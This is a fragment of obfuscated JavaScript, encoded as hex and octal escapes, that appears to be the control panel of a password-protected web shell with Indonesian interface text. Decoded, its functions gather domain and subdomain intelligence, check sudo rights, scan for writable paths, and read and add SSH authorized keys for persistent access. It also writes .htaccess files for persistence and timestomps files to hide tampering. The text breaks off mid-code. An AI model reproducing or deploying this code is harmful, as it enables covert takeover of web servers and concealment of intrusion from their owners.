x78\164\103\x6f\156\x74\x65\x6e\x74\x20\75\x20\x27\342\235\x8c\x20\x50\141\x73\163\x77\157\x72\144\40\164\151\x64\x61\153\x20\x62\x6f\154\145\x68\x20\153\x6f\163\157\156\x67\41\x27\73\12\11\11\11\x9\x9\160\x61\x73\x73\x77\157\162\144\x45\162\x72\157\x72\x2e\x63\154\x61\163\x73\114\151\x73\164\56\x61\144\144\x28\x27\x73\x68\157\x77\47\x29\73\xa\11\11\11\x9\11\160\x61\163\x73\x77\x6f\162\x64\111\x6e\x70\165\164\x2e\x73\164\171\154\145\x2e\142\157\162\144\x65\162\x43\157\154\157\162\40\x3d\x20\47\166\x61\162\50\x2d\x2d\141\143\143\145\x6e\x74\x2d\162\145\x64\x29\x27\x3b\xa\11\11\x9\x9\11\160\141\x73\163\x77\x6f\162\144\111\156\x70\165\x74\56\146\157\143\165\x73\50\51\73\xa\11\x9\x9\x9\11\162\x65\x74\x75\x72\156\x3b\12\11\x9\x9\x9\x7d\12\x9\11\11\x9\12\11\11\11\11\x69\146\x20\50\145\x6e\x74\145\162\x65\x64\x50\141\163\x73\167\x6f\x72\x64\40\41\x3d\x3d\40\143\x6f\162\x72\145\143\x74\x50\141\163\x73\x77\157\x72\x64\x29\x20\x7b\12\x9\11\11\11\x9\x70\x61\163\x73\x77\x6f\x72\x64\x45\162\162\x6f\162\x2e\164\x65\170\x74\103\157\156\164\x65\156\x74\x20\75\x20\47\xe2\235\214\x20\120\141\x73\163\167\157\162\144\x20\163\x61\154\141\x68\x21\x20\101\x6b\x73\x65\x73\40\x64\151\164\x6f\x6c\141\x6b\x2e\x27\73\12\x9\x9\11\11\x9\x70\141\163\163\x77\x6f\x72\144\105\162\x72\x6f\x72\x2e\x63\x6c\141\x73\163\x4c\151\163\164\56\141\144\x64\50\47\163\x68\x6f\x77\x27\51\x3b\12\x9\x9\x9\x9\11\160\141\x73\163\167\x6f\x72\144\x49\156\160\165\x74\56\163\164\x79\x6c\x65\56\142\x6f\x72\144\145\x72\x43\x6f\x6c\157\x72\40\75\x20\x27\166\x61\162\50\x2d\x2d\x61\143\x63\x65\156\x74\55\162\145\x64\x29\x27\x3b\12\x9\x9\x9\11\11\x70\141\163\x73\167\x6f\162\x64\x49\x6e\x70\x75\164\56\166\x61\x6c\165\x65\x20\x3d\40\x27\x27\73\xa\11\x9\x9\x9\x9\x70\x61\x73\x73\167\157\x72\x64\x49\x6e\x70\x75\164\x2e\146\157\143\165\x73\50\51\73\xa\11\11\11\x9\11\163\x65\x74\x54\x69\x6d\x65\157\165\x74\50\50\51\40\x3d\x3e\40\x7b\xa\11\11\x9\11\x9\11\x70\141\x73\x73\x77\157\162\144\105\162\x72\157\162\x2e\x63\154\141\x73\x73\x4c\151\163\x74\x2e\x72\145\155\157\x76\145\x28\x27\163\x68\x6f\x77\47\x29\x3b\xa\x9\11\11\x9\11\175\x2c\x20\x33\60\60\x30\51\x3b\xa\11\x9\11\x9\11\162\145\164\x75\162\156\x3b\xa\x9\11\x9\11\x7d\xa\11\x9\11\11\12\x9\11\x9\x9\57\57\x20\120\x61\x73\x73\x77\157\x72\144\x20\x63\157\x72\x72\x65\143\164\xa\11\11\x9\11\160\141\163\163\167\x6f\x72\x64\105\162\162\157\x72\x2e\x74\145\x78\164\103\x6f\x6e\164\145\156\x74\40\75\x20\47\47\x3b\12\11\x9\11\11\x70\141\x73\163\x77\157\162\144\105\x72\x72\x6f\x72\x2e\143\x6c\141\x73\163\114\x69\163\x74\56\162\145\155\157\166\145\x28\47\163\150\157\x77\47\x29\73\xa\11\x9\11\x9\x70\x61\x73\163\167\x6f\162\x64\x49\x6e\x70\165\164\56\163\164\171\154\x65\x2e\142\x6f\162\144\145\x72\103\157\154\x6f\162\40\x3d\40\x27\166\141\162\50\55\x2d\x61\143\143\145\156\x74\55\x67\162\145\x65\156\51\x27\73\xa\11\11\x9\11\163\x75\142\155\x69\164\x42\164\x6e\56\x64\151\163\141\142\154\x65\144\40\x3d\x20\x74\x72\x75\x65\x3b\xa\11\11\x9\x9\163\x75\x62\155\151\164\102\x74\156\x2e\164\145\170\164\103\x6f\156\x74\x65\x6e\164\x20\x3d\x20\47\342\234\205\40\x56\x65\x72\151\x66\x79\151\156\x67\56\x2e\x2e\x27\x3b\12\11\11\x9\x9\12\11\11\11\11\x73\145\164\x54\151\x6d\x65\157\x75\164\50\50\51\x20\75\76\x20\173\12\11\x9\x9\11\11\x74\x68\151\163\56\x63\154\157\x73\x65\x4d\157\x64\141\154\x28\x6d\x6f\144\141\154\51\73\xa\x9\x9\x9\x9\11\x63\x61\154\154\x62\141\143\x6b\x28\51\x3b\xa\x9\x9\x9\x9\175\x2c\40\65\60\60\x29\x3b\12\11\x9\x9\175\73\xa\11\x9\11\xa\11\11\x9\x2f\57\40\105\166\145\x6e\x74\40\154\151\163\x74\145\x6e\145\x72\163\xa\11\x9\11\143\157\x6e\x73\x74\x20\x63\154\x65\x61\156\165\160\x20\x3d\40\50\51\40\x3d\x3e\40\173\xa\11\x9\11\x9\163\165\142\155\151\x74\x42\164\x6e\56\157\x6e\x63\x6c\151\x63\153\40\x3d\40\x6e\x75\154\x6c\73\12\x9\x9\11\11\143\141\x6e\x63\x65\x6c\102\x74\156\x2e\157\x6e\143\x6c\x69\x63\x6b\40\x3d\40\x6e\165\x6c\x6c\x3b\12\x9\x9\11\11\x63\154\x6f\163\x65\x42\164\156\x2e\157\x6e\x63\x6c\151\x63\153\x20\75\x20\156\165\x6c\154\x3b\xa\x9\x9\11\x9\x63\x6f\x70\x79\102\164\156\x2e\x6f\156\x63\x6c\151\143\x6b\40\75\40\156\x75\x6c\x6c\73\xa\11\x9\11\11\x70\x61\x73\x73\167\x6f\x72\144\111\x6e\x70\165\164\x2e\x6f\156\153\x65\171\x70\x72\x65\x73\163\x20\75\x20\156\x75\154\x6c\73\12\11\x9\x9\x7d\73\xa\x9\x9\x9\12\x9\11\11\x73\165\142\155\151\164\x42\164\x6e\56\x6f\x6e\143\x6c\151\x63\x6b\40\x3d\x20\166\x61\x6c\x69\144\x61\164\145\101\x6e\x64\123\x75\x62\x6d\x69\164\73\12\11\x9\x9\x63\141\156\x63\x65\154\102\164\156\x2e\x6f\156\143\154\151\x63\153\40\x3d\40\x28\51\40\x3d\x3e\x20\173\12\11\x9\11\11\x63\154\145\141\x6e\165\x70\x28\51\x3b\12\x9\11\x9\11\164\150\151\x73\56\x63\x6c\x6f\163\x65\x4d\x6f\144\141\x6c\x28\155\x6f\144\141\154\x29\73\xa\11\x9\x9\x9\x74\150\x69\x73\x2e\164\157\141\163\164\x28\x27\x4f\160\x65\x72\141\x73\x69\x20\144\151\x62\x61\x74\x61\x6c\153\141\156\56\x27\54\40\47\x65\162\x72\x6f\162\47\x29\73\xa\11\11\x9\x7d\x3b\12\11\x9\11\x63\x6c\x6f\163\145\x42\x74\x6e\x2e\x6f\x6e\143\x6c\x69\x63\x6b\40\75\x20\50\x29\x20\75\76\x20\x7b\xa\11\x9\x9\x9\143\154\145\141\156\165\x70\50\x29\73\12\x9\11\x9\11\164\150\151\163\56\143\x6c\157\163\x65\115\157\144\x61\154\50\155\157\x64\141\154\51\x3b\xa\x9\x9\11\11\164\x68\151\163\56\x74\x6f\141\x73\x74\x28\x27\x4f\x70\x65\x72\141\163\151\x20\x64\151\142\141\164\x61\x6c\x6b\x61\156\56\x27\54\40\47\145\162\162\x6f\x72\x27\x29\x3b\xa\x9\x9\11\175\x3b\xa\x9\x9\x9\143\x6f\x70\171\102\164\156\56\157\156\143\154\151\143\153\40\75\x20\143\157\x70\x79\120\x61\x73\163\167\157\x72\x64\73\12\11\11\11\12\11\x9\11\57\57\x20\105\156\x74\145\x72\x20\x6b\145\x79\40\164\157\x20\163\165\x62\x6d\x69\x74\xa\11\x9\11\160\141\163\163\167\157\x72\x64\111\x6e\160\x75\x74\56\157\x6e\x6b\145\x79\x70\x72\145\163\x73\40\75\40\50\x65\51\x20\75\76\x20\173\xa\x9\11\x9\11\151\146\x20\50\x65\x2e\x6b\145\171\x20\x3d\x3d\x3d\40\47\x45\156\x74\145\162\47\51\40\173\12\x9\11\11\x9\11\166\x61\x6c\x69\144\x61\x74\x65\101\x6e\144\x53\165\x62\x6d\x69\164\x28\51\x3b\12\x9\x9\11\x9\x7d\12\x9\11\11\x7d\x3b\12\x9\x9\x9\xa\11\x9\x9\57\x2f\x20\103\x6c\x65\x61\x72\40\x65\162\x72\157\162\x20\x6f\x6e\x20\x69\x6e\x70\165\x74\12\11\x9\11\x70\x61\x73\x73\167\157\162\x64\x49\x6e\160\x75\164\x2e\x6f\x6e\x69\156\160\165\x74\40\75\x20\x28\51\x20\75\x3e\40\173\12\11\11\11\11\151\x66\40\x28\x70\x61\163\x73\x77\157\162\x64\x45\x72\x72\157\x72\56\143\154\x61\163\x73\114\151\163\164\56\x63\x6f\x6e\x74\x61\151\x6e\x73\x28\47\163\x68\157\x77\47\51\x29\40\x7b\xa\x9\11\11\x9\x9\x70\x61\163\163\x77\x6f\x72\x64\105\x72\162\157\x72\56\143\154\141\x73\163\114\151\x73\164\56\162\145\155\x6f\166\145\x28\47\163\x68\x6f\x77\x27\x29\73\xa\11\x9\11\11\x9\x70\x61\163\x73\167\x6f\x72\144\x49\x6e\x70\x75\164\x2e\163\x74\x79\154\145\x2e\142\157\x72\x64\x65\x72\x43\x6f\x6c\157\x72\x20\x3d\40\47\166\x61\162\x28\x2d\x2d\x62\x6f\162\144\x65\162\x2d\x63\157\x6c\157\162\51\47\x3b\12\11\11\11\x9\x7d\xa\11\x9\x9\x7d\73\xa\x9\11\x7d\x2c\xa\11\x9\xa\11\11\141\163\x79\156\143\x20\162\x75\x6e\104\157\155\x61\x69\x6e\x49\156\x74\145\x6c\x28\x29\40\x7b\xa\11\x9\x9\164\150\151\163\56\x73\150\157\167\x50\141\163\x73\167\157\x72\x64\x4d\157\x64\x61\154\50\x28\x29\x20\x3d\x3e\40\173\12\11\11\11\11\164\150\151\x73\56\x74\x6f\141\163\x74\50\47\342\x9c\x85\x20\x50\141\x73\163\x77\157\162\144\40\x62\x65\156\x61\162\56\x20\x47\141\x74\150\145\162\151\156\x67\40\144\157\155\141\x69\x6e\40\x69\x6e\x74\x65\154\x6c\x69\147\145\156\143\145\x2e\56\x2e\x27\51\73\12\11\x9\x9\11\x74\x68\x69\163\56\141\160\x69\50\47\x67\x65\164\137\144\x6f\155\141\151\x6e\137\151\x6e\x74\x65\154\x27\51\x2e\164\150\x65\x6e\50\x72\145\x73\40\75\x3e\40\x7b\xa\x9\x9\x9\x69\146\40\50\x72\x65\163\x20\46\x26\x20\162\x65\163\x2e\x73\x74\141\164\165\x73\x20\x3d\x3d\x3d\40\x27\x73\165\x63\x63\145\x73\x73\x27\51\x20\x7b\12\x9\x9\x9\11\143\x6f\x6e\163\164\40\173\40\150\x6f\x73\x74\54\x20\x69\160\x2c\40\144\156\163\137\162\x65\143\x6f\x72\144\163\x2c\40\x6f\164\150\x65\x72\x5f\163\151\164\x65\x73\x2c\x20\146\x6f\165\x6e\144\137\163\x75\x62\x64\157\155\x61\x69\156\x73\x20\175\x20\x3d\40\x72\x65\163\x2e\x69\156\164\x65\x6c\x3b\12\x9\11\x9\11\x64\x6f\143\165\x6d\145\156\x74\x2e\147\145\164\105\154\145\x6d\x65\156\164\102\x79\x49\144\x28\x27\151\x6e\164\x65\x6c\55\150\157\x73\x74\x2d\156\x61\155\145\47\51\x2e\151\x6e\156\145\x72\x54\145\170\164\x20\75\x20\150\157\163\164\73\xa\x9\x9\x9\x9\x64\x6f\143\165\155\145\x6e\164\x2e\x67\145\164\105\154\x65\155\145\x6e\x74\102\x79\x49\x64\50\x27\x69\x6e\164\x65\x6c\55\151\160\55\141\144\x64\x72\x27\x29\x2e\x69\156\156\145\x72\124\145\x78\x74\x20\x3d\x20\x69\160\73\xa\x9\x9\11\x9\144\157\x63\165\x6d\x65\156\x74\x2e\x67\145\164\105\154\145\x6d\145\x6e\164\102\x79\111\144\x28\47\151\156\x74\145\154\55\x64\156\x73\55\x6f\x75\x74\160\x75\164\x27\x29\x2e\151\x6e\156\145\x72\x54\x65\170\x74\40\x3d\x20\x64\156\163\137\x72\145\143\157\162\144\163\56\154\x65\x6e\x67\164\150\40\x3e\40\60\x20\77\40\x4a\123\117\116\56\163\x74\x72\x69\156\147\x69\x66\x79\50\x64\x6e\x73\x5f\x72\145\x63\157\x72\x64\163\54\40\x6e\x75\x6c\154\54\40\62\51\x20\72\40\47\x4e\x6f\40\x44\x4e\x53\40\162\145\143\x6f\162\x64\x73\40\x66\x6f\x75\156\x64\56\x27\73\xa\x9\11\x9\x9\144\157\143\165\155\x65\156\x74\56\147\145\x74\x45\154\145\x6d\145\156\164\102\x79\111\144\x28\47\151\x6e\x74\145\154\55\x72\x65\166\145\162\163\145\55\x69\160\55\x6f\165\164\160\165\164\x27\x29\x2e\151\156\156\x65\162\124\145\x78\164\40\75\x20\x6f\x74\150\145\162\x5f\x73\x69\164\145\163\73\12\x9\11\11\11\x64\157\x63\165\155\x65\x6e\x74\x2e\x67\145\x74\105\154\145\155\x65\x6e\x74\102\x79\x49\144\x28\x27\151\156\x74\x65\154\x2d\x73\165\142\x64\157\x6d\x61\151\156\163\x2d\157\165\x74\x70\x75\164\x27\x29\x2e\x69\156\x6e\145\x72\x54\145\170\x74\40\75\40\x66\157\x75\156\x64\x5f\x73\165\x62\144\x6f\x6d\141\151\x6e\x73\56\x6c\x65\x6e\147\x74\150\40\76\x20\x30\x20\x3f\x20\x66\x6f\165\156\144\x5f\163\x75\142\144\157\x6d\x61\151\x6e\x73\x2e\152\157\x69\x6e\50\x27\134\156\47\51\40\x3a\40\47\x4e\x6f\40\x63\157\155\x6d\x6f\x6e\40\x73\165\x62\144\157\x6d\141\151\x6e\163\40\146\x6f\165\x6e\144\56\47\x3b\xa\x9\11\11\11\x64\157\143\x75\155\x65\x6e\164\x2e\x67\145\164\105\x6c\x65\x6d\145\x6e\x74\x42\x79\111\144\50\47\144\157\155\x61\151\156\55\151\156\x74\145\x6c\55\x72\x65\x73\x75\x6c\x74\163\x27\51\x2e\x73\164\x79\x6c\145\x2e\144\151\x73\x70\x6c\141\x79\40\x3d\40\47\x62\x6c\157\x63\x6b\47\73\12\x9\x9\11\x9\x74\x68\x69\163\x2e\x74\x6f\x61\x73\164\x28\x27\111\x6e\x74\x65\x6c\x6c\x69\147\145\156\143\x65\x20\x67\x61\164\150\145\x72\151\156\147\x20\143\157\155\x70\x6c\x65\x74\145\56\x27\x29\x3b\xa\x9\x9\x9\11\11\x7d\40\145\x6c\x73\145\x20\173\x20\xa\x9\11\x9\x9\x9\x9\164\150\151\163\56\164\157\x61\x73\164\x28\47\x46\141\151\154\x65\x64\x20\164\157\40\x67\x61\x74\x68\145\162\40\144\x6f\155\x61\151\x6e\x20\x69\156\x74\x65\x6c\x6c\151\147\x65\156\143\145\x2e\x27\x2c\40\x27\x65\x72\x72\x6f\x72\x27\51\73\x20\12\x9\11\x9\x9\x9\x7d\xa\11\11\x9\x9\175\x29\x3b\xa\x9\x9\x9\x7d\51\73\xa\11\x9\175\54\12\11\x9\x61\x73\x79\156\143\x20\x72\165\x6e\x53\165\144\157\x43\150\x65\x63\x6b\x28\51\40\173\40\143\157\156\x73\x74\x20\157\165\164\x70\x75\x74\105\154\40\75\40\x64\157\143\165\x6d\145\x6e\x74\x2e\147\145\164\x45\x6c\145\155\145\x6e\164\x42\171\x49\x64\x28\47\x73\165\x64\x6f\55\143\x68\145\143\x6b\x2d\x6f\165\164\160\165\x74\47\51\x3b\40\157\165\x74\x70\165\164\105\x6c\56\x73\164\x79\x6c\145\x2e\144\x69\x73\160\x6c\x61\x79\40\75\40\x27\x62\154\x6f\x63\153\47\x3b\40\157\x75\x74\x70\x75\164\105\154\x2e\x69\x6e\x6e\x65\162\124\x65\x78\x74\40\75\x20\47\103\150\x65\143\153\151\x6e\x67\x2e\56\56\x27\x3b\40\x63\x6f\156\163\x74\x20\x72\145\163\40\x3d\40\x61\x77\141\151\x74\40\164\x68\151\x73\x2e\x61\x70\x69\x28\47\163\165\x64\157\137\x63\x68\145\143\153\47\x29\73\40\x69\146\x20\x28\162\145\x73\40\x26\46\x20\x72\145\163\56\163\164\x61\164\165\x73\40\75\75\x3d\x20\x27\x73\x75\x63\x63\145\163\x73\x27\x29\40\157\x75\x74\x70\165\x74\x45\154\56\x69\156\x6e\145\162\x48\x54\115\x4c\x20\75\x20\162\145\x73\x2e\144\x61\164\x61\x3b\x20\x7d\54\xa\11\x9\141\x73\x79\156\143\40\x67\145\x74\125\163\x65\162\103\x6f\156\164\x65\170\x74\50\x29\40\x7b\x20\x63\x6f\x6e\163\164\40\x6f\165\x74\160\x75\164\105\154\x20\75\40\144\157\143\165\155\145\x6e\x74\x2e\x67\x65\x74\x45\154\x65\155\x65\156\164\102\171\x49\x64\x28\x27\165\x73\x65\x72\x2d\143\157\156\x74\145\170\164\x2d\157\x75\164\x70\x75\164\47\x29\x3b\40\157\x75\164\x70\165\164\105\x6c\56\163\x74\x79\154\x65\x2e\144\151\x73\160\154\x61\171\x20\75\x20\47\142\154\x6f\x63\153\x27\73\x20\x6f\165\164\x70\x75\164\x45\x6c\56\x69\x6e\156\x65\162\124\x65\x78\x74\x20\75\40\47\103\150\145\x63\x6b\x69\x6e\x67\56\x2e\x2e\x27\73\x20\x63\157\x6e\x73\x74\x20\x72\x65\163\40\75\40\x61\x77\141\151\164\x20\164\150\x69\x73\x2e\141\x70\x69\x28\x27\x67\x65\164\x5f\x75\163\145\162\x5f\x63\x6f\x6e\x74\145\170\164\47\x29\x3b\40\x69\x66\40\50\x72\x65\x73\x20\46\46\x20\162\145\163\56\163\164\141\164\x75\x73\40\x3d\75\x3d\40\47\x73\165\x63\143\x65\163\163\47\x29\x20\157\x75\x74\160\x75\164\x45\154\x2e\x69\156\156\x65\x72\110\124\115\114\40\75\40\x72\x65\x73\56\x64\x61\164\141\73\x20\x7d\54\12\x9\x9\x61\x73\171\x6e\x63\40\x66\x69\x6e\x64\127\x72\x69\x74\x61\142\154\x65\50\x29\x20\173\12\11\x9\x9\x63\x6f\x6e\163\164\40\160\141\x74\150\40\75\x20\x64\157\143\x75\155\x65\156\x74\x2e\147\x65\164\105\154\145\x6d\x65\156\164\x42\x79\x49\144\50\47\x77\162\x69\x74\141\x62\x6c\145\x2d\163\143\x61\x6e\55\x70\x61\x74\150\x27\x29\x2e\x76\x61\x6c\x75\145\x2c\x20\157\165\164\160\x75\x74\105\154\40\75\x20\x64\x6f\143\165\x6d\x65\156\x74\x2e\x67\145\164\x45\x6c\145\x6d\145\156\164\x42\x79\111\144\x28\47\x77\x72\x69\164\x61\x62\154\x65\55\157\165\x74\x70\165\164\x27\x29\x3b\40\151\146\40\50\41\160\141\164\150\51\x20\162\145\164\x75\162\156\40\164\150\x69\x73\56\x74\157\x61\x73\164\50\47\x50\141\x74\x68\40\x69\x73\40\162\x65\161\165\x69\x72\145\x64\x2e\x27\x2c\40\47\145\162\162\x6f\x72\47\51\73\12\11\x9\11\x6f\x75\164\x70\165\x74\x45\154\56\x69\x6e\156\x65\x72\x54\x65\170\164\40\75\x20\47\x53\x63\x61\156\x6e\x69\x6e\x67\x2e\x2e\x2e\47\x3b\x20\x63\x6f\156\163\x74\40\162\x65\x73\40\x3d\40\x61\x77\x61\151\x74\40\x74\x68\x69\x73\56\141\160\151\50\x27\x66\x69\156\144\137\x77\162\151\x74\141\x62\154\145\47\x2c\x20\x7b\x20\160\141\164\x68\40\175\x29\73\40\151\146\40\50\x72\145\x73\40\x26\x26\x20\162\145\163\56\163\x74\x61\x74\x75\163\x20\x3d\75\x3d\40\x27\163\165\143\x63\x65\x73\x73\47\x29\40\157\165\x74\160\165\164\105\154\56\151\x6e\156\x65\x72\x48\x54\115\x4c\x20\x3d\x20\x72\145\x73\56\144\141\x74\x61\73\xa\x9\x9\x7d\x2c\12\x9\x9\141\163\171\x6e\x63\x20\147\x65\x74\123\163\150\113\145\x79\163\x28\51\40\x7b\x20\x63\x6f\156\x73\x74\40\x72\145\163\40\x3d\x20\141\x77\x61\x69\x74\x20\164\150\151\163\x2e\141\x70\x69\x28\x27\163\163\x68\x5f\155\141\156\x61\147\x65\x72\47\54\x20\x7b\40\163\x75\142\x5f\141\143\164\x69\157\x6e\x3a\x20\x27\147\x65\x74\47\x20\175\x29\x3b\x20\x69\x66\x20\x28\x72\145\x73\40\x26\x26\x20\162\x65\163\56\163\164\x61\164\x75\163\40\75\75\x3d\40\47\163\165\143\x63\x65\x73\x73\47\x29\x20\173\x20\144\x6f\x63\165\x6d\145\156\164\56\147\145\x74\x45\x6c\145\x6d\x65\156\164\102\x79\x49\144\x28\47\x73\x73\150\x2d\x6b\145\x79\x73\x2d\143\x6f\x6e\164\145\x6e\x74\47\x29\56\x76\141\x6c\x75\x65\40\75\40\162\x65\x73\56\143\157\156\x74\145\x6e\164\73\x20\x64\157\x63\165\155\145\156\164\x2e\147\x65\x74\105\x6c\145\155\x65\x6e\164\102\x79\111\144\50\47\163\163\x68\55\x61\165\x74\150\x2d\x6b\145\171\x73\55\160\x61\164\x68\x27\x29\x2e\151\x6e\156\x65\x72\x54\145\170\164\40\75\x20\162\145\163\56\160\x61\164\150\x3b\40\151\x66\x28\41\162\145\x73\x2e\x77\162\151\164\141\142\154\145\x29\40\164\150\x69\163\x2e\x74\157\x61\x73\164\50\x27\141\165\164\x68\157\x72\151\x7a\145\144\x5f\153\145\x79\163\40\x66\x69\x6c\145\x20\157\x72\x20\x7e\x2f\x2e\163\x73\150\x20\x64\151\162\x65\143\x74\x6f\162\x79\x20\151\x73\40\156\157\x74\x20\167\162\x69\164\x61\142\x6c\145\56\x27\x2c\40\47\145\x72\162\x6f\x72\47\51\x3b\x20\x64\x6f\x63\165\x6d\x65\x6e\x74\56\147\x65\164\105\154\x65\x6d\145\156\164\x42\x79\111\144\50\47\141\x64\x64\55\x73\x73\x68\x2d\153\x65\171\x2d\x62\164\x6e\47\x29\56\144\x69\x73\x61\x62\x6c\145\144\x20\x3d\x20\41\162\145\x73\56\167\162\151\164\x61\x62\154\145\x3b\40\144\157\143\x75\x6d\145\x6e\164\56\x67\x65\164\105\x6c\145\155\x65\x6e\164\102\x79\111\144\50\x27\141\x64\x64\55\163\163\150\x2d\x6b\x65\x79\x2d\x63\157\x6e\x74\145\156\164\47\51\x2e\144\151\x73\x61\142\x6c\145\x64\40\75\40\41\162\145\x73\56\x77\x72\x69\x74\x61\142\x6c\x65\73\40\175\40\x7d\54\12\x9\x9\x61\163\x79\x6e\143\x20\141\144\144\x53\163\x68\113\x65\x79\x28\51\40\173\40\143\x6f\x6e\x73\164\x20\153\145\x79\x20\75\40\x64\x6f\143\x75\155\145\x6e\164\56\x67\145\164\105\154\x65\x6d\145\x6e\164\x42\171\111\144\50\47\x61\x64\144\55\163\x73\x68\55\x6b\x65\x79\x2d\x63\157\x6e\164\x65\156\164\47\51\x2e\166\x61\x6c\x75\145\73\40\151\x66\x28\41\x6b\x65\171\x29\x20\x72\145\x74\x75\162\156\40\164\150\151\163\56\x74\x6f\x61\x73\x74\x28\47\123\x53\110\x20\x6b\x65\171\x20\x63\x61\x6e\156\157\164\40\142\145\x20\x65\x6d\x70\x74\x79\x2e\x27\54\40\x27\145\162\x72\x6f\162\x27\x29\x3b\40\x63\x6f\x6e\163\x74\40\x72\145\x73\40\x3d\40\141\x77\141\x69\x74\x20\x74\150\151\163\56\x61\160\x69\50\x27\x73\x73\x68\x5f\x6d\141\x6e\x61\x67\145\162\47\54\40\173\40\x73\165\x62\137\141\x63\164\151\x6f\x6e\x3a\40\x27\141\144\144\x27\54\40\153\145\x79\40\175\x29\73\x20\151\146\x28\x72\x65\163\x20\x26\46\40\x72\x65\x73\56\163\164\x61\x74\x75\x73\x20\x3d\75\x3d\x20\x27\163\x75\x63\143\x65\x73\163\47\x29\40\x7b\40\164\150\x69\x73\x2e\164\157\x61\163\x74\50\x72\145\x73\56\155\x65\163\163\x61\147\145\x29\73\40\x74\150\151\163\56\x67\x65\164\x53\163\150\x4b\x65\x79\163\x28\x29\x3b\x20\x64\x6f\143\165\155\145\156\x74\56\x67\x65\164\x45\x6c\x65\x6d\x65\x6e\x74\102\171\111\144\x28\x27\141\x64\144\55\163\x73\x68\x2d\x6b\145\171\55\143\x6f\x6e\164\x65\156\164\x27\x29\x2e\166\x61\x6c\165\x65\x20\x3d\40\47\x27\x3b\x20\175\x20\x7d\x2c\12\x9\11\141\x73\x79\156\x63\40\x61\x70\160\154\171\x48\x74\141\x63\143\x65\163\163\x50\x65\x72\x73\151\163\x74\50\51\40\173\40\143\157\x6e\163\164\x20\160\141\x74\x68\x20\75\x20\144\157\x63\165\155\x65\156\164\x2e\147\x65\164\x45\x6c\145\x6d\x65\x6e\164\102\x79\111\144\50\x27\x68\x74\x61\143\x63\145\x73\x73\55\x70\141\x74\x68\x27\x29\x2e\166\141\x6c\x75\x65\54\40\146\151\154\x65\156\141\155\x65\40\75\x20\144\x6f\143\x75\155\145\x6e\164\x2e\x67\145\164\105\x6c\x65\x6d\x65\x6e\164\x42\171\x49\144\50\47\150\164\x61\143\x63\x65\163\163\55\x66\x69\154\145\156\x61\155\x65\47\51\56\166\141\154\x75\145\73\40\x69\146\x28\x21\x70\141\164\150\40\x7c\x7c\40\x21\146\x69\x6c\145\156\x61\x6d\145\51\40\x72\145\164\165\x72\x6e\40\x74\x68\x69\163\x2e\x74\157\141\163\x74\50\x27\120\141\x74\150\40\141\156\144\40\x46\x69\x6c\x65\156\x61\155\145\x20\x61\162\x65\x20\162\x65\161\165\x69\162\145\x64\56\x27\54\40\47\x65\x72\162\x6f\162\47\x29\x3b\x20\x63\x6f\x6e\163\x74\40\x63\x6f\x6e\146\151\162\x6d\145\144\40\75\x20\x61\x77\x61\x69\164\40\x74\x68\x69\163\56\x73\150\157\167\x43\x6f\156\x66\x69\x72\155\x4d\x6f\x64\x61\x6c\x28\x60\124\x68\151\163\x20\167\x69\x6c\154\x20\x63\162\x65\141\x74\145\x20\157\x72\x20\x6d\x6f\144\x69\x66\171\x20\x2e\150\164\141\143\x63\145\163\163\x20\151\156\40\74\x73\164\162\x6f\x6e\147\x3e\44\173\x70\141\x74\150\175\74\x2f\x73\164\x72\x6f\156\147\x3e\56\40\101\x72\x65\x20\171\157\165\40\x73\165\162\145\77\x60\x2c\x20\173\40\x74\x79\160\x65\72\x20\47\167\141\x72\156\x69\x6e\x67\x27\x20\x7d\x29\73\x20\151\146\x28\x63\x6f\x6e\x66\x69\x72\155\x65\144\x29\40\x7b\40\143\157\x6e\x73\164\40\162\x65\x73\40\75\x20\141\167\141\x69\164\40\164\x68\151\x73\x2e\141\x70\x69\x28\x27\150\164\141\143\x63\x65\x73\x73\137\x70\x65\162\x73\x69\163\x74\47\54\x20\x7b\40\x70\141\164\150\x2c\x20\x66\x69\x6c\145\x6e\141\155\145\x20\x7d\51\x3b\40\x69\x66\50\162\145\x73\51\x20\x74\x68\151\163\x2e\x74\x6f\x61\x73\164\50\162\x65\163\x2e\155\145\163\163\141\147\x65\54\x20\x72\145\x73\56\163\x74\141\164\x75\163\x29\73\x20\175\x20\x7d\54\12\x9\x9\163\150\x6f\167\x54\x69\x6d\x65\x73\164\157\x6d\160\x4d\x6f\x64\x61\154\50\160\141\x74\x68\51\40\x7b\x20\x63\157\x6e\163\x74\40\x6d\157\144\x61\x6c\x20\75\40\144\x6f\143\165\x6d\145\x6e\164\56\147\145\164\105\154\145\x6d\x65\x6e\164\102\171\x49\x64\x28\47\164\x69\155\145\163\x74\x6f\155\160\55\x6d\157\x64\141\154\47\51\x3b\40\164\x68\x69\x73\x2e\163\x68\x6f\167\x4d\x6f\144\x61\154\50\x6d\x6f\x64\x61\154\x29\73\x20\144\x6f\143\x75\x6d\145\x6e\x74\x2e\147\145\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\111\144\50\47\164\x69\x6d\145\x73\x74\x6f\155\160\x2d\144\145\163\164\x2d\x66\151\154\x65\x6e\141\155\x65\x27\x29\56\151\x6e\x6e\x65\162\x54\x65\170\164\x20\75\x20\160\141\164\150\x2e\163\160\x6c\151\x74\50\47\x2f\x27\x29\56\160\x6f\160\x28\x29\x3b\40\143\x6f\x6e\x73\164\40\151\x6e\x70\165\x74\x20\x3d\40\144\157\143\x75\155\x65\x6e\164\x2e\x67\x65\164\x45\x6c\x65\x6d\x65\156\x74\102\171\x49\x64\50\47\164\151\155\145\163\x74\157\155\160\55\163\x6f\165\162\x63\145\55\151\x6e\160\x75\x74\x27\x29\73\40\151\x6e\x70\x75\x74\x2e\x66\157\143\x75\x73\x28\51\x3b\40\x64\157\143\165\x6d\145\156\x74\x2e\x67\145\x74\105\154\x65\155\145\x6e\164\102\x79\111\144\50\47\164\151\x6d\x65\163\164\157\x6d\160\55\x73\x61\166\145\x2d\x62\164\156\47\51\56\x6f\156\143\x6c\151\143\x6b\x20\75\40\x61\163\171\156\143\x20\50\51\x20\x3d\76\40\x7b\40\143\x6f\156\163\x74\40\163\x6f\165\x72\x63\145\40\75\x20\151\x6e\160\x75\164\56\166\141\x6c\x75\x65\x3b\x20\151\146\40\50\163\x6f\165\162\143\x65\x29\x20\173\x20\143\x6f\x6e\x73\164\40\x72\145\163\40\75\x20\141\x77\x61\x69\x74\x20\164\150\x69\163\56\x61\x70\x69\x28\x27\164\151\155\145\x73\x74\157\x6d\x70\47\54\40\173\40\144\x65\163\x74\x3a\40\160\x61\x74\x68\x2c\x20\x73\x6f\165\162\x63\x65\40\175\51\x3b\x20\x69\146\40\x28\x72\x65\163\x29\x20\173\x20\x74\150\151\163\56\1